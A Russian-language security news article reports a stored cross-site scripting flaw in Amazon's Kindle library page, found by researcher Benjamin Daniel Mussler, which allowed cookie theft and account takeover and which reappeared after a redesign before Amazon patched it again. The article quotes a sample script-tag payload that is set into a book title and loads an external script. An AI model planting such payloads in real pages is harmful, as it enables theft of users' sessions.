Уязвимость в Amazon позволяет хакерам получить контроль над учетной записью жертвы [Обновлено]

image

Теги: уязвимости в мобильных утсройствах

Брешь ранее была исправлена, но появилась снова после обновления дизайна одной из страниц сайта.

Немецкий исследователь Бенджамин Дэниел Мюсслер (Benjamin Daniel Mussler) обнаружил уязвимость в Amazon Kindle, которая позволяет злоумышленникам получить контроль над учетной записью жертвы. Брешь связана с коллекцией электронных книг пользователя.

Когда человек добавляет в свою библиотеку новую электронную книгу, заголовок которой содержит скрипт наподобие

<script src=”https://www.example.org/script.js></script>,

код, прописанный в скрипте, выполняется незамедлительно при входе на web-страницу «Библиотека Kindle». Как результат, злоумышленник может получить доступ к cookie-файлам жертвы и передать их на свой компьютер. Таким образом учетная запись пострадавшего оказывается скомпрометированной.

Как пишет Мюсслер в своем блоге, уязвимость была обнаружена еще в октябре прошлого года. После того, как он уведомил администрацию Amazon об этой бреши, она была исправлена. Тем не менее, после обновления дизайна страницы «Manage Your Kindle» в этом году уязвимость вновь появилась.

Для того чтобы избежать компрометации собственной учетной записи, не стоит покупать или загружать электронные книги из ненадежных источников.

Обновление: Компания выпустила исправление бреши в Amazon Kindle, позволяющую злоумышленникам получить контроль над учетной записью жертвы. 

Telegram Подписывайтесь на канал "SecurityLab" в Telegram, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

comments powered by Disqus